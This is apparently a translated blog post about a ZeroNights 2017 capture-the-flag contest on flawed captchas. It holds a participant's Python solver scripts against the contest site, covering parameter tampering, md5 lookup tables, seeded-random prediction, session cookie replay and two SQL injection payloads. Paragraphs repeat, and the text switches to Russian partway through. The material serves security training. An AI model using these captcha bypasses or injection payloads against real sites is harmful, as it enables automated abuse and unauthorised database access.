Challenges with ZeroNights 2017: Become the Captcha King
This year, at the ZeroNights information security conference, the SberTech application information security testing department invited ZeroNights participants to look for vulnerabilities in various captcha implementations. In total, we gave 11 examples with logical or software errors that allow solving a lot of captchas in a short time. In each round, participants were required to “solve” 20 captchas in 10 seconds and at the same time gain the right percentage of correct answers.
We invite you to participate too. In the post we will post links to all tasks compiled by fryday , and under them in the spoilers - write-up of Liro participant with the correct answers.
To access the tasks you need to register on the site with the tasks. It will not take much time - there are no confirmation letters, after entering your data you can immediately log in.
This activity is intended to familiarize yourself with the interface. At the beginning of each task, a brief description will be given, the total number of captchas, the required percentage of correctly entered captchas and the solution time, as well as the points earned. By the number of points you can approximately estimate the complexity of the task.
We invite you to participate too. In the post we will post links to all tasks compiled by fryday , and under them in the spoilers - write-up of Liro participant with the correct answers.
To access the tasks you need to register on the site with the tasks. It will not take much time - there are no confirmation letters, after entering your data you can immediately log in.
Warm up mission : Ciferka
This activity is intended to familiarize yourself with the interface. At the beginning of each task, a brief description will be given, the total number of captchas, the required percentage of correctly entered captchas and the solution time, as well as the points earned. By the number of points you can approximately estimate the complexity of the task.
Task 2 : “A little bit greeky”
Decision
In this assignment, each time we are invited to introduce a “conscious” word. Quickly google - it turns out that these are the names of the gods from Greek mythology. After entering a few captchas and viewing the picture code, we notice that each time the picture number changes:
We can assume that the number of pictures is limited. The page code contains links to the captcha itself. We unload them with our hands - there were 16 in total.
We have a finite number of pictures with numbers from 1 to 16, where each number corresponds to the name of a specific character. Now it remains for each request to find the captcha number in the page code and send the desired character corresponding to this number:
We can assume that the number of pictures is limited. The page code contains links to the captcha itself. We unload them with our hands - there were 16 in total.
We have a finite number of pictures with numbers from 1 to 16, where each number corresponds to the name of a specific character. Now it remains for each request to find the captcha number in the page code and send the desired character corresponding to this number:
def chal2():
def load_captcha_images():
url = "http://captcha.cf/static/ciferki/{}.png"
for i in range(1, 16):
resp = requests.get(url.format(i))
with open('captcha1/{}.png'.format(i), 'wb') as f:
f.write(resp.content)
gods = 'Zeus Hera Aphrodite Apollo Ares Leto Athena Phobos Dionysus Hades Triton Hermes Eos Poseidon Morpheus'
captcha_solutions = gods.split()
resp = s.post('http://captcha.cf/challenge/2/start', proxies=proxies)
resp = s.get('http://captcha.cf/challenge/2', proxies=proxies)
for i in range(50):
captcha_match = re.search(r'', resp.text)
if not captcha_match:
print(resp.text)
captcha_num = int(captcha_match.group(1))
print('captcha_num:', captcha_num)
resp = s.post(
'http://captcha.cf/captcha',
data={'answer': captcha_solutions[captcha_num - 1]},
proxies=proxies)
Task 3 : "One, two, three ..."
Decision
If you carefully read the assignment, you will notice one oddity - we need only 24% of the correct answers for the successful completion. Remember this and continue our search.
In all captchas of this task, we are prompted to introduce the result of summing some numbers. After passing through all the captchas, it becomes clear that only numbers from 1 to 4 are used in the summation.
We will sort through all possible combinations that may appear, based on our guesses that numbers greater than 4 are not used in total:
The most frequent result of the sum is 5, exactly 25% of all amounts. The condition costs 24% of the correct captchas, so if we set “5” as the answer for everyone, then we will solve the problem:
In all captchas of this task, we are prompted to introduce the result of summing some numbers. After passing through all the captchas, it becomes clear that only numbers from 1 to 4 are used in the summation.
We will sort through all possible combinations that may appear, based on our guesses that numbers greater than 4 are not used in total:
1 + 1 = 2 | 2 + 1 = 3 | 3 + 1 = 4 | 4 + 1 = 5 |
1 + 2 = 3 | 2 + 2 = 4 | 3 + 2 = 5 | 4 + 2 = 6 |
1 + 3 = 4 | 2 + 3 = 5 | 3 + 3 = 6 | 4 + 3 = 7 |
1 + 4 = 5 | 2 + 4 = 6 | 3 + 4 = 7 | 4 + 4 = 8 |
The most frequent result of the sum is 5, exactly 25% of all amounts. The condition costs 24% of the correct captchas, so if we set “5” as the answer for everyone, then we will solve the problem:
def chal3():
resp = s.post('http://captcha.cf/challenge/3/start', proxies=proxies)
for i in range(20):
resp = s.post('http://captcha.cf/captcha', data={'answer': 5}, proxies=proxies)
time.sleep(65)
Task 4 : "We need to go deeper"
Decision
We look at the page code and see the obfuscated JavaScript there. Most likely, this code also checks the correctness of the entered captcha. Let's test our theory using Burp Suite:
In addition to the captcha introduced, the “correct” parameter is also sent to the server. It is 1. That is, you can trick the server by sending it the same captcha value each time, while adding the correct parameter:
In addition to the captcha introduced, the “correct” parameter is also sent to the server. It is 1. That is, you can trick the server by sending it the same captcha value each time, while adding the correct parameter:
def chal4():
resp = s.post('http://captcha.cf/challenge/4/start', proxies=proxies)
for i in range(20):
print(i)
s.post('http://captcha.cf/captcha', data={'answer': '0C8X4', 'correct': '1'}, allow_redirects=False, proxies=proxies)
Task 5 : Promzona
Decision
Visual analysis of the captcha yields nothing, so we used Burp Suite for analysis:
As it turned out, in addition to the captcha response, the “kod” parameter is also sent to the server, which is stored in the page code:
It’s easy to guess that the “kod” parameter is md5 hash from the answer. Thus, we send to the server 20 times the correct answer / kod pair, and the task is counted:
As it turned out, in addition to the captcha response, the “kod” parameter is also sent to the server, which is stored in the page code:
It’s easy to guess that the “kod” parameter is md5 hash from the answer. Thus, we send to the server 20 times the correct answer / kod pair, and the task is counted:
def chal5():
resp = s.post('http://captcha.cf/challenge/5/start', proxies=proxies)
for i in range(20):
print(i)
s.post('http://captcha.cf/captcha', data={'answer': '55', 'kod':'b53b3a3d6ab90ce0268229151c9bde11'}, allow_redirects=False, proxies=proxies)
Task 6 : Dispersion
Decision
When entering the captcha, we noticed that the length of the captcha is always five characters, and it uses only capital letters and numbers. After reviewing the code, we also see that the name of the captcha image is an md5 hash from its characters.
Analysis through Burp Suite shows that we need only the answer field, which is the answer to the captcha.
The small thing is to extract the necessary hash value from the page code, and use it to restore the value of the captcha. However, the inverse of the hash function is difficult to compute, so let's go the other way. Let's compile a table of pairs of all possible captchas (only uppercase letters and numbers, the length of the captcha is always 5 characters) and the values of md5 hashes from them, we will search for the required captcha value by hash:
To complete the task, it was necessary to write additional functions:
Analysis through Burp Suite shows that we need only the answer field, which is the answer to the captcha.
The small thing is to extract the necessary hash value from the page code, and use it to restore the value of the captcha. However, the inverse of the hash function is difficult to compute, so let's go the other way. Let's compile a table of pairs of all possible captchas (only uppercase letters and numbers, the length of the captcha is always 5 characters) and the values of md5 hashes from them, we will search for the required captcha value by hash:
def chal6():
resp = s.post('http://captcha.cf/challenge/6/start')
for i in range(20):
m = re.search(r'static/regenbogen/(.*?)\.png', resp.text)
hash_ = m.group(1)
word = sh.grep(hash_, 'md5_tables/' + hash_[0] + '.md5').split(':')[1].strip()
print(hash_, word)
resp = s.post('http://captcha.cf/captcha', data={'answer': word})
To complete the task, it was necessary to write additional functions:
- we generated all possible md5 hashes for answers with a length of 5 characters, consisting of capital letters and numbers;
- To complete the task at a given time, we sorted all the hashes by the first character. Those. we look at the first character of the captcha hash, open the necessary sorting block and search for it only in this block.
alphabet = string.ascii_lowercase + string.digits
def gen_md5_table():
a = string.ascii_uppercase + string.digits
table = itertools.product(a, repeat=5)
f = open('md5_table', 'w')
for i in table:
s = hashlib.md5(bytes(''.join(i), 'ascii')).hexdigest() + ':' + ''.join(i)
print(s)
f.write(s + '\n')
f.close()
# call gen_md5_table
# in bash: sort md5_table > md5_sorted
# in bash: mkdir md5_tables
# call split_to_files
def split_to_files():
file_handlers = {}
for a in alphabet:
file_handlers[a] = open('md5_tables/' + a +'.md5', 'w')
with open('md5_sorted') as f:
for line in f:
file_handlers[line[0]].write(line)
Task 7 : “Four rooms”
Decision
To our surprise, instead of obscure, difficult to read characters, we see a beautiful, absolutely understandable picture in the task:
Thanks to the readability of the picture, you can use the technology of optical character recognition. In python3, the pytesseract OCR module. I had to fix the function a bit, removing possible spaces from the read text that are not implied when entering captcha.
Thanks to the readability of the picture, you can use the technology of optical character recognition. In python3, the pytesseract OCR module. I had to fix the function a bit, removing possible spaces from the read text that are not implied when entering captcha.
def chal7():
s.post('http://captcha.cf/challenge/7/start', proxies=proxies)
for i in range(1, 21):
resp = s.get('http://captcha.cf/captcha/image', proxies=proxies)
image_name = '/tmp/{}.png'.format(i)
with open(image_name, 'wb') as f:
f.write(resp.content)
text = pytesseract.image_to_string(Image.open(image_name), config='psm -7').replace(' ', '')
print('text:', text)
s.post('http://captcha.cf/captcha', data={'answer': text}, allow_redirects=False, proxies=proxies)
Task 8 : “Strategic Explorations of Exoplanets and Disks with Subaru”
Decision
Before us seems to be an ordinary terrible captcha. Let's see the code of the pictures:
The numbers increase, but no sequences are traced during the captcha input. After some thought, it becomes clear: our conditions correspond to time. This is a parameter that gradually increases, but the dependence here does not lie on the surface, since it is impossible to perform actions manually at perfectly equal intervals of time.
The number on the captcha is some modification of the time prescribed in the page code. One way to use time is to initialize a random number generator. We noticed that the captcha numbers ranged from 10,000 to 100,000. These boundaries were set to generate random numbers.
The numbers increase, but no sequences are traced during the captcha input. After some thought, it becomes clear: our conditions correspond to time. This is a parameter that gradually increases, but the dependence here does not lie on the surface, since it is impossible to perform actions manually at perfectly equal intervals of time.
The number on the captcha is some modification of the time prescribed in the page code. One way to use time is to initialize a random number generator. We noticed that the captcha numbers ranged from 10,000 to 100,000. These boundaries were set to generate random numbers.
def chal8():
resp = s.post('http://captcha.cf/challenge/8/start', proxies=proxies)
for i in range(20):
m = re.search(r'/static/random/42_(\d+).png', resp.text)
r = m.group(1)
random.seed(int(r))
print('r:', r)
ans = random.randrange(10000,100000)
resp = s.post('http://captcha.cf/captcha', data={'answer': ans}, proxies=proxies)
Task 9 : Watson
Decision
Let's start immediately with Burp Suite:
This task is already more difficult. In addition to the “answer” field, there is nothing, which means you need to look for a way to solve somewhere else. After some research, we got to the analysis of the sent cookie value. Note that their value is very similar to the information encoded in base64. Let's check this:
The captcha field indicates that the validity of the captcha is confirmed with a cookie. That is, for a certain session and a certain field “answer”, our answer will always be considered correct:
This task is already more difficult. In addition to the “answer” field, there is nothing, which means you need to look for a way to solve somewhere else. After some research, we got to the analysis of the sent cookie value. Note that their value is very similar to the information encoded in base64. Let's check this:
The captcha field indicates that the validity of the captcha is confirmed with a cookie. That is, for a certain session and a certain field “answer”, our answer will always be considered correct:
def chal9():
resp = s.post('http://captcha.cf/challenge/9/start', proxies=proxies)
for i in range(20):
cookies = {'session':'eyJjYXB0Y2hhIjoiZjhkYTJlYjY4ZmU2YmRjZmY4YTk1NzJiNjMxNGQ2YmMiLCJ1c2VybmFtZSI6ImRtaXRyeS5tYW50aXNAZ21haWwuY29tIn0.DO94IQ.gHUIa3tyIgQ-JdpQ-O0GwUerTSI'}
requests.post('http://captcha.cf/captcha', data={'answer': 'ICF4G'}, allow_redirects=False, proxies=proxies, cookies=cookies)
Activity 10 : Medicine
Decision
For successful completion of the task, you must exploit the SQL injection in the answer parameter. The logic of the request is to compare the result of the captcha from the captcha table from the database with the captcha received from the user. Based on this, we will pass the answer parameter to the input:
We automate the operation process:
11111’ union select result from sqli.captcha where id=’’ -- 1
We automate the operation process:
def chal10():
resp = s.post('http://captcha.cf/challenge/10/start')
for i in range(20):
m = re.search(r'name="id" value="(.*?)">', resp.text)
id_ = m.group(1)
print(id_)
data = {
'answer': "asdadsdsa' union select result from sqli.captcha where id='{}' — 1".format(id_),
'id': id_
}
resp = s.post('http://captcha.cf/captcha', data=data)
Task 11 : "Poliklinika"
Decision
Иногда составители заданий проводят аналогии между названиями самих заданий и способами решения проблемы. Медицинская тема сработала в прошлой задаче. Также и название Poliklinika наталкивает на попытки использовать SQL-инъекции для решения задачи. Для начала наше задание прогоним через Burp:
Опять нам нужны два поля – «answer» и «id». Второй параметр можно получить из кода страницы:
Видно, что логика SQL запроса представляет собой нечто подобное
SELECT id FROM captcha_table WHERE captcha=’$captcha’
с дальнейшей сверкой полученного результата с параметром id запроса.
Поменяем логику запроса, отдавая в параметре с капчей anything’ or id=’id_parsed_from_page_body.Thanks to the logical OR, the request will be executed successfully and the received id from the database will match the id transmitted in the request.
We’ll verify by exploiting the SQL injection on captcha input:
Operation was successful, it remains only to automate the delivery of the results.
Опять нам нужны два поля – «answer» и «id». Второй параметр можно получить из кода страницы:
Видно, что логика SQL запроса представляет собой нечто подобное
SELECT id FROM captcha_table WHERE captcha=’$captcha’
с дальнейшей сверкой полученного результата с параметром id запроса.
Поменяем логику запроса, отдавая в параметре с капчей anything’ or id=’id_parsed_from_page_body.Thanks to the logical OR, the request will be executed successfully and the received id from the database will match the id transmitted in the request.
We’ll verify by exploiting the SQL injection on captcha input:
Operation was successful, it remains only to automate the delivery of the results.
def chal11():
resp = s.post('http://captcha.cf/challenge/11/start', proxies=proxies)
for i in range(20):
m = re.search(r'name="id" value="(.*?)">', resp.text)
cid = m.group(1)
data = { 'answer': "asdadsdsa' or id='{}' -- 1".format(cid), 'id': cid}
resp = s.post('http://captcha.cf/captcha', data=data, proxies=proxies)